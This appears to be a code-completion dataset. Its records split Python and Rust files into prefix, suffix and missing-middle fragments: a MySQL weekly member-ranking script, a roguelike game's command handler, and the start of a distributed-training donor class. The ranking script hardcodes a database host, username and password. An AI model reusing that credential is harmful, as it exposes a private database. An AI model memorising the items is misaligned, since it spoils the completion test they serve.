'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] | random_line_split | ||
memberweekactrank.py |
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, | return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
) | identifier_body | |
command.rs | KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> |
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world | {
select_tile(context, maybe_examine_tile).map(|_| ())
} | identifier_body |
command.rs | (context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> {
select_tile(context, maybe_examine_tile).map(|_| ())
}
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn draw_line(start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
} |
use renderer::ui::layers::ChoiceLayer; | random_line_split | |
command.rs | Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> {
select_tile(context, maybe_examine_tile).map(|_| ())
}
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn | draw_line | identifier_name | |
vanilla.py | the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
